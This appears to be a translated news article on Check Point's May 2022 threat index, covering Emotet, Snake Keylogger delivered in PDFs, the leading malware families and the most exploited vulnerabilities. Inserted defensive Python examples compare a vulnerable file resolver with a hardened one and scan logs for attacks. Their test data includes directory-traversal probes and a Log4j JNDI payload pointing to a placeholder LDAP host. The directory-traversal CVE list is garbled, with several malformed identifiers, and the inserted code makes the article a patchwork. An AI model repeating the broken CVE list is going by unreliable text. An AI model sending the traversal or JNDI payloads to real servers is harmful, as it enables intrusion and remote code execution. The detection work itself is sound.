Malware distributed via email with a PDF file attached

Check Point Research (CPR), the threat intelligence arm of Check Point Software Technologies Ltd. (NASDAQ: CHKP), a global provider of cyber security solutions, released its Global Threat Index for May 2022. Researchers report that Emotet, an advanced, self-propagating, modular Trojan that uses multiple methods to maintain persistence and evasion techniques to avoid detection, is still the most widespread malware both worldwide and in Brazil as a result of widespread campaigns. Also in May, the Snake Keylogger malware jumped to eighth place after a long absence from the index; its main function is to record the keystrokes typed by the user and transmit the collected data to the attackers.

Snake Keylogger is usually distributed via emails that carry attachments with docx or xlsx extensions containing malicious macros. In May, however, CPR researchers reported that Snake Keylogger was being spread via PDF files. This may be due to Microsoft blocking Internet macros by default in Office, which means that cybercriminals have had to be more creative, turning to other file types such as PDFs. This rarer method of distributing malware has proven effective because some people believe that PDF files are safer than other types of files.

As for Emotet, this malware affects 8% of organizations worldwide, a small increase since April. Emotet is an agile malware that proves profitable because of its ability to remain undetected. Its persistence also makes it harder to remove once a device is infected, making it the perfect tool for cybercriminals. Originally a banking Trojan, it is often distributed via phishing emails and has the ability to deliver other malware, increasing its chances of causing widespread damage.

“As the latest Snake Keylogger campaign shows, everything we do online is at risk of a cyberattack, and opening a PDF file is no exception. Viruses and malicious executable code can hide inside multimedia content and links, and the malware attack, in this case Snake Keylogger, is ready to strike as soon as a user opens the PDF file,” said Maya Horowitz, Vice President of Research at Check Point Software Technologies.

“So, just as we would question the legitimacy of docx or xlsx files in email attachments, we should be equally vigilant about PDFs. In today’s world, it is more important than ever for an organization to have a robust email security solution that quarantines and inspects attachments, preventing malicious files from entering the network in the first place,” Maya said.

Most attacked sectors and most exploited vulnerabilities

CPR also reported that in May, education and research continued to rank first on the list of the sectors most attacked by cybercriminals worldwide. “Web Servers Malicious URL Directory Traversal” is the top exploited vulnerability, affecting 46% of organizations globally, followed by “Apache Log4j Remote Code Execution”, also with a global impact of 46%. “Web Server Exposed Git Repository Information Disclosure” ranks third in the index, with a global impact of 45%.

Top malware families


In May, Emotet was the most prevalent malware, affecting 8% of organizations worldwide, followed by Formbook and AgentTesla in second and third place, each affecting 2% of organizations.

- Emotet – An advanced, self-propagating and modular Trojan. Emotet was once a banking Trojan and has recently been used as a distributor of other malware or malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection. It can also be spread through phishing spam emails containing malicious attachments or links.

- Formbook – An infostealer that targets the Windows operating system and was first detected in 2016. It is sold as Malware-as-a-Service (MaaS) on underground hacking forums because of its strong evasion techniques and relatively low price. FormBook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files according to commands from its C&C (Command & Control) server.

- AgentTesla – An advanced RAT (Remote Access Trojan) that acts as a keylogger and information stealer, able to monitor and collect the victim’s keyboard input and system clipboard, take screenshots, and exfiltrate credentials for various software installed on the victim’s machine (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client).

By sector, in May, education and research continued to be the most attacked sector in the world, followed by Government/Military and Internet Service Providers & Managed Service Providers (ISPs/MSPs), respectively, the same ranking as in March and April.

1. Education/Research

2. Government/Military

3. Internet Service Providers (ISP)/Managed Service Providers (MSP)

In Brazil, the three most targeted areas in the national rankings in May were:

1. System Integrator/VAR/Distributor

2. Sales / Marketing

3. Government/Military

The education/research sector is ranked sixth nationally.

Top exploited vulnerabilities

In May, the CPR team also reported that “Web Servers Malicious URL Directory Traversal” was the most commonly exploited vulnerability, affecting 46% of organizations worldwide, followed closely by “Apache Log4j Remote Code Execution”, which remains in second place with a global impact of 46%. “Web Server Exposed Git Repository Information Disclosure” ranks third on the list of most exploited vulnerabilities, with an impact of 45%.

- Web Servers Malicious URL Directory Traversal (CVE-2010-4598, CVE-2011-2474, CVE-2014-0130, CVE-2014-0780, CVE-2015-0666, CVE-2015-4068, CVE-2545, CVE-2015 -2016-4523, CVE-2016-8530, CVE-2017-11512, CVE-2018-3948, CVE-2018-3949, CVE-2019-18952, CVE-2020-5410, CVE-260) – A directory traversal vulnerability exists on various web servers. The vulnerability is due to an input validation error on a web server that does not properly sanitize the Uniform Resource Identifier (URI) for directory traversal patterns. Successful exploitation allows an unauthenticated remote attacker to disclose or access arbitrary files on the vulnerable server.
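The sanitization failure described above is easiest to see side by side with its fix. The following is an added example, not Check Point's code and not taken from any of the listed CVEs: a naive static-file resolver that concatenates the request path onto the web root, beside a hardened resolver that decodes the path (twice, to catch double-encoding), canonicalises it and requires the result to stay inside the web root. The web root, file names and request paths are constructed samples created in a temporary directory.

```python
"""Directory traversal: a naive static-file resolver beside a hardened one.

Added example, not code from Check Point or from any of the listed CVEs.
The web root, file names and request paths below are constructed samples.
"""
import tempfile
from pathlib import Path
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import unquote

# Constructed web root with one public file; a "secret" file sits one level
# above it, standing in for a file such as /etc/passwd.
_BASE = Path(tempfile.mkdtemp())
WEB_ROOT = _BASE / "htdocs"
WEB_ROOT.mkdir()
(WEB_ROOT / "index.html").write_text("<h1>public</h1>")
(_BASE / "secret.txt").write_text("not for the web")


def resolve_naive(request_path: str) -> Optional[Path]:
    """Vulnerable: glues the decoded path onto the web root without checking
    where the resulting path actually points."""
    return Path(str(WEB_ROOT) + "/" + unquote(request_path.lstrip("/")))


def resolve_hardened(request_path: str) -> Optional[Path]:
    """Hardened: decode twice (double-encoding), reject NUL bytes, resolve
    symlinks and '..' segments, then require the result to stay under
    WEB_ROOT. Returns None when the request must be rejected."""
    decoded = unquote(unquote(request_path))
    if "\x00" in decoded:
        return None
    candidate = (WEB_ROOT / decoded.lstrip("/")).resolve()
    root = WEB_ROOT.resolve()
    try:
        candidate.relative_to(root)  # raises ValueError when outside root
    except ValueError:
        return None
    return candidate


def serve(request_path: str, resolver: Callable[[str], Optional[Path]]) -> Tuple[int, str]:
    """Minimal handler: 200 with the file body, 403 when the resolver rejects
    the request, 404 when the file does not exist."""
    target = resolver(request_path)
    if target is None:
        return 403, "forbidden"
    if not target.is_file():
        return 404, "not found"
    return 200, target.read_text()


# Constructed probes: an ordinary request, then plain, URL-encoded and
# double-encoded traversal sequences.
PROBES = [
    "/index.html",
    "/../secret.txt",
    "/..%2fsecret.txt",
    "/%252e%252e%2fsecret.txt",
]


def compare() -> Dict[str, Tuple[int, int]]:
    """Status code returned by (naive, hardened) for each probe."""
    return {
        p: (serve(p, resolve_naive)[0], serve(p, resolve_hardened)[0])
        for p in PROBES
    }


if __name__ == "__main__":
    for path, (naive, hardened) in compare().items():
        print(f"{path:28} naive={naive} hardened={hardened}")
```

The naive resolver happily returns the file outside the web root for the plain and single-encoded probes; it only "survives" the double-encoded probe because it decodes once, which is exactly the kind of accident a server that decodes twice would not have. The hardened resolver answers 403 to all three traversal probes while still serving the legitimate file.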

- Apache Log4j Remote Code Execution (CVE-2021-44228) – A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.

- Web Server Exposed Git Repository Information Disclosure – An information disclosure vulnerability has been reported in Git repositories served by web servers. Successful exploitation of this vulnerability may allow the unintentional disclosure of account information.
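For the three web-server issues in this list, a defender's first question is whether the organisation's own access logs show them being probed. The block below is an added example, not Check Point's code: it parses constructed combined-format (Apache/Nginx) log lines and flags traversal sequences in the decoded path, requests for the `.git/` directory (marking a 200 response as a confirmed exposure rather than a mere probe), and Log4j JNDI lookup strings in the path, referer or user agent. The client addresses, paths and timestamps are invented.

```python
"""Access-log triage for directory traversal, Log4j JNDI lookups and exposed
.git repositories.

Added example, not Check Point's code; the log lines are constructed and the
assumed field layout is the common Apache/Nginx combined format.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed combined-format lines. Addresses, hosts and paths are invented.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2022:08:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/May/2022:08:01:05 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "curl/7.81"
198.51.100.7 - - [10/May/2022:08:01:07 +0000] "GET /static/..%2f..%2fetc/passwd HTTP/1.1" 404 0 "-" "python-requests/2.27"
198.51.100.8 - - [10/May/2022:08:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://example.invalid/a}"
203.0.113.5 - - [10/May/2022:08:01:11 +0000] "GET /.gitignore HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns are applied to the decoded path so %2f / %2e encodings do not
# slip past them.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
GIT_RE = re.compile(r"(^|/)\.git(/|$)")  # ".gitignore" is a file, not the repo
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def classify(line: str) -> List[str]:
    """Return the findings raised by one log line (empty list if none)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    path = unquote(unquote(m["path"]))  # decode twice to catch double-encoding
    findings: List[str] = []
    if TRAVERSAL_RE.search(path):
        findings.append("directory-traversal")
    if GIT_RE.search(path):
        # A 200 means the repository directory is actually being served.
        suffix = "-confirmed" if m["status"] == "200" else "-probe"
        findings.append("git-exposure" + suffix)
    for field in (path, m["referer"], m["ua"]):
        if JNDI_RE.search(field):
            findings.append("log4j-jndi")
            break
    return findings


def triage(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """(client ip, request path, findings) for every line that raised something."""
    out: List[Tuple[str, str, List[str]]] = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            m = LINE_RE.match(line)
            out.append((m["ip"] if m else "?", m["path"] if m else line, findings))
    return out


if __name__ == "__main__":
    for ip, path, findings in triage(SAMPLE_LOG):
        print(f"{ip:14} {path:40} {', '.join(findings)}")
```

On the sample, the ordinary `/index.html` and `/.gitignore` requests are left alone, while the `.git/config` hit is reported as a confirmed exposure because the server answered 200; that distinction tells the responder whether to treat the event as reconnaissance or as an actual disclosure to investigate.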

Top mobile malware

In May, mobile malware stayed in the same position as the April index: AlienBot was the most used mobile malware, followed by FluBot and xHelper.

1. AlienBot – The AlienBot malware family is Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker, as a first step, to inject malicious code into legitimate financial applications. The attacker gains access to the victims’ accounts and ultimately takes full control of the device.

2. FluBot – An Android botnet malware distributed via phishing SMS messages, most of which impersonate delivery brands and logistics apps. As soon as the user clicks on the link in the message, FluBot is installed and gains access to all the sensitive information on the phone.

3. xHelper – A malicious Android application, seen in the wild since March 2019, used to download other malicious applications and display ads. The application can hide itself from the user and re-install itself if removed.

Top malware in Brazil in May

The top malware in Brazil in May was once again Emotet, which regained the lead with a 23.55% impact on organizations. Chaes dropped to second place (6.88%) in the national ranking; this malware mainly attacks e-commerce platforms in Latin America and is responsible for campaigns designed to steal information from customers of Mercado Livre and Mercado Pago, among others. The PseudoManuscrypt malware ranked third (3.75%); it is spyware used in espionage campaigns that mostly threatens government organizations and industrial control systems. This spyware has advanced spying capabilities, including taking screenshots of victims and collecting VPN authentication credentials.

Check Point’s Global Threat Impact Index and its ThreatCloud Map are powered by Check Point’s ThreatCloud intelligence, a collaborative network that provides real-time threat intelligence from hundreds of millions of sensors worldwide, across networks, endpoints and mobile devices. The intelligence is enriched with AI-based engines and exclusive research data from the Check Point Research (CPR) division.
